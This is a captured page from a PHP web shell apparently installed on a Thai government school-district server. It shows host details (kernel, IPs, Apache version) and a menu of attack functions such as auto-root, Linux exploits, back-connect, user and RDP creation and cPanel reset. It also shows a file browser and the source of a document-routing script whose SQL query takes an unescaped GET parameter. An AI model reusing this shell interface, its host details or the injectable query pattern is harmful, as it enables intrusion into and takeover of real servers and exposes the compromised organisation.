Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss_test /
modules /
book /
xml /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
bookarea.php
5.28
KB
-rw-r--r--
bookobec_detail.php
8.18
KB
-rw-r--r--
bookobec_detail2.php
7.72
KB
-rw-r--r--
bookobec_detail3.php
6.94
KB
-rw-r--r--
bookobec_old.php
4.05
KB
-rw-r--r--
bookobec_test.php
4.09
KB
-rw-r--r--
receive_bookobec.php
16.63
KB
-rw-r--r--
receive_bookobec_other.php
16.56
KB
-rw-r--r--
receive_bookobec_other2.php
13.56
KB
-rw-r--r--
receive_file.php
1.92
KB
-rw-r--r--
select_send.php
7.61
KB
-rw-r--r--
select_send_5.php
7.01
KB
-rw-r--r--
send_bookobec.php
23.68
KB
-rw-r--r--
send_detail.php
8.07
KB
-rw-r--r--
send_report_bookobec.php
14.03
KB
-rw-r--r--
time_inc.php
4.99
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : send_detail.php
<?php session_start(); ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <?php if(isset($_SESSION['user_os'])){ if($_SESSION['user_os']=='mobile'){ echo "<meta name = 'viewport' content = 'width = device-width'>"; } } ?> <style type="text/css"> <!-- .style1 { font-size: 12px; } --> </style> </head> <body> <?php date_default_timezone_set('Asia/Bangkok'); require_once "../../../database_connect.php"; require_once("../../../mainfile.php"); require_once("../time_inc.php"); // อาเรย์ชื่อหน่วยงาาน $sql_khet = mysqli_query($connect,"SELECT * FROM system_khet") ; while ($row_array= mysqli_fetch_array($sql_khet)){ $office_name_ar[$row_array['khet_code']]=$row_array['khet_precis']; } $sql_book = "select * from book_main where ms_id='$_GET[b_id]' "; $dbquery_book = mysqli_query($connect,$sql_book); $row2= mysqli_fetch_array($dbquery_book); $id = $row2['ms_id']; $ref_id = $row2['ref_id']; $office = $row2['office']; $sender = $row2['sender']; $level = $row2['level']; $book_no = $row2['book_no']; $signdate = $row2['signdate']; $subject = $row2['subject']; $ref_id = $row2['ref_id']; $rec_date = $row2['send_date']; $detail = $row2['detail']; $detail = nl2br($detail) ; $send_date=thai_date_4($rec_date); $signdate=thai_date_3($signdate); //ผู้ส่งหนังสือ $sql_person = "select * from person_khet_main where person_id='$sender' "; $dbquery_person = mysqli_query($connect,$sql_person); $row_name= mysqli_fetch_array($dbquery_person); ?> <div align="center"> <table border="1" width="480" id="table1" style="border-collapse: collapse; border: 1px dotted #FF00FF; ; padding-left:4px; padding-right:4px; padding-top:1px; padding-bottom:1px" cellpadding="2" > <tr><td bgcolor="#003399" colspan="2" style="border: 1px dotted #808000"><font color="#FFFFFF"> <span lang="en-us"><font size="2"> </font></span><font size="2">รายละเอียดหนังสือ <?php echo $book_no;?></font></font></td></tr> <tr><td width="449" align="right" colspan="2" style="border: 1px dotted #808000"> <p align="left"><font size="2"> เรื่อง : </font><FONT SIZE="2" COLOR="#CC3300"><?php echo $subject;?></FONT></td> </tr> <tr><td width="449" align="left" colspan="2" style="border: 1px dotted #808000"> <font size="2"> หนังสือลงวันที่ : </font> <FONT SIZE="2" COLOR="#CC3300"><?php echo $signdate;?></font></td></tr> <tr><td width="449" align="left" colspan="2" style="border: 1px dotted #808000"> <font size="2"> ส่งโดย : </font><FONT SIZE="2" COLOR="#CC3300"><?php echo $office_name_ar[$office];?> [<?php echo $row_name['name'];?> <?php echo $row_name['surname'];?>]</font></td> </tr> <tr><td width="449" align="left" colspan="2" style="border: 1px dotted #808000"> <font size="2"> วันเวลาที่ส่ง : </font><FONT SIZE="2" COLOR="#CC3300"><?php echo $send_date;?></font> </td> </tr> <tr><td width="85" align="left" style="border: 1px dotted #808000"><font size="2"> เนื้อหาโดยสรุป</font></td> <td width="377" align="left" style="border: 1px dotted #808000"> <div align="center"> <table border="1" width="95%" id="table2" style="border-collapse: collapse" bordercolor="#808000" cellspacing="2" cellpadding="2"> <tr><td align="left"><FONT SIZE="2" align="left"><?php echo $detail;?></FONT></td></tr> </table> </div> </td> </tr> <tr><td align="left" style="border: 1px dotted #808000"><font size="2"> ไฟล์แนบ </font></td> <td width="377" align="left" style="border: 1px dotted #808000"> <div align="center"> <table border="1" width="95%" id="table3" style="border-collapse: collapse" bordercolor=#669999 cellspacing="2" cellpadding="2"> <?php // check file attach if($row2['bookregis_link']==0){ $sql_file = mysqli_query($connect,"SELECT * FROM book_filebook WHERE ref_id = '$ref_id' ") ; $road="../../../upload/book/upload_files/"; } else if($row2['bookregis_link']==1){ $sql_file = mysqli_query($connect,"SELECT * FROM bookregister_send_filebook WHERE ref_id='$ref_id' ") ; $road="../../../bookregister/upload_files2/"; } $file_num = mysqli_num_rows ($sql_file) ; if ($file_num<> 0) { $list = 1 ; while ($list<= $file_num&&$row= mysqli_fetch_array($sql_file)) { $file_name = $row ['file_name'] ; $file_des = $row ['file_des'] ; //xx if($row2['secret']==1){ ?> <tr><td align="left"> <FONT SIZE="2"><?php echo $list;?>. </FONT><FONT SIZE="2"><span style="text-decoration: none"><?php echo $file_des;?></span></FONT></td></tr> <?php } else{ ?> <tr><td align="left"> <FONT SIZE="2"><?php echo $list;?>. </FONT><A HREF="../upload_files/<?php echo $road.$file_name;?>" title="คลิกเพื่อเปิดไฟล์แนบลำดับที่ <?php echo $list;?>" target="_BLANK"><FONT SIZE="2" COLOR="#CC0099"><span style="text-decoration: none"><?php echo $file_des;?></span></FONT></A></td></tr> <?php } //endxx $list ++ ; } }else { ?> <tr><td> <FONT SIZE="2" COLOR="#CC3300"> ไม่มีไฟล์แนบ</FONT></td></tr> <?php } ?> </table> </div> </td></tr> </table> <table align="center"> <tr> <td align="center" colspan="2"><BR><b> <font size="2" color="#6600CC">ส่งถึง</font></b></td> </tr> </table> <table border="1" width="98%" id="table3" style="border-collapse: collapse" bordercolor=#669999 cellpadding="2"> <?php // อาเรย์ชื่อหน่วยงาาน $office_name_ar['saraban']="สารบรรณกลาง"; $sql_work_group = mysqli_query($connect,"SELECT * FROM system_department") ; while ($row_work_group= mysqli_fetch_array($sql_work_group)){ $office_name_ar[$row_work_group['department']]=$row_work_group['department_name']; } // สพท. $sql_sch = mysqli_query($connect,"SELECT * FROM system_khet") ; while ($row_sch= mysqli_fetch_array($sql_sch)){ $office_name_ar[$row_sch['khet_code']]=$row_sch['khet_precis']; } // สศค. $sql_sch = mysqli_query($connect,"SELECT * FROM system_special_unit") ; while ($row_sch= mysqli_fetch_array($sql_sch)){ $office_name_ar[$row_sch['unit_code']]=$row_sch['unit_name']; } // รร. $sql_sch2 = mysqli_query($connect,"SELECT * FROM system_school") ; while ($row_sch2= mysqli_fetch_array($sql_sch2)){ $office_name_ar[$row_sch2['school_code']]=$row_sch2['school_name']; } $sql_name = "select * from book_sendto_answer where ref_id='$ref_id' and send_level='2' order by id"; $dbquery_name = mysqli_query($connect,$sql_name); $M=1; while ($result_name=mysqli_fetch_array($dbquery_name)) { $send_to= $result_name['send_to']; $answer=$result_name['answer']; $answer_time=$result_name['answer_time']; if($answer_time!=""){ $answer_time=thai_date_4($answer_time); } echo "<tr><td width='40%' align='left'> <FONT SIZE='2'>$M.</FONT><FONT SIZE='2'>$office_name_ar[$send_to]</FONT></td><td align='left'>"; if ($answer==0) { $ans_img = "<IMG SRC=\"../images/b_usrdrop.png\" WIDTH=\"16\" HEIGHT=\"16\" BORDER=\"0\" ALT=\"ยังไม่ลงทะเบียนรับ \"><FONT SIZE=\"2\" COLOR=\"\">ยังไม่ลงทะเบียนรับ</FONT>" ; } else if($answer==1) { $ans_img = "<IMG SRC=\"../images/b_usrcheck.png\" WIDTH=\"16\" HEIGHT=\"16\" BORDER=\"0\" ALT=\"ลงทะเบียนรับแล้ว\"><FONT SIZE=\"2\" COLOR=\"\">ลงทะเบียนรับแล้วเมื่อ $answer_time</FONT>" ; } echo $ans_img; echo "</td></tr>"; $M++; } $date=date("Y-m-d H:i:s"); $date_now=thai_date_4($date); ?> </table> </div> <br /> <CENTER><input border="0" src="../images/button95.jpg" name="I1" width="100" height="20" type="image" onClick="javascript:window.close()"></CENTER> </body> </html>
Close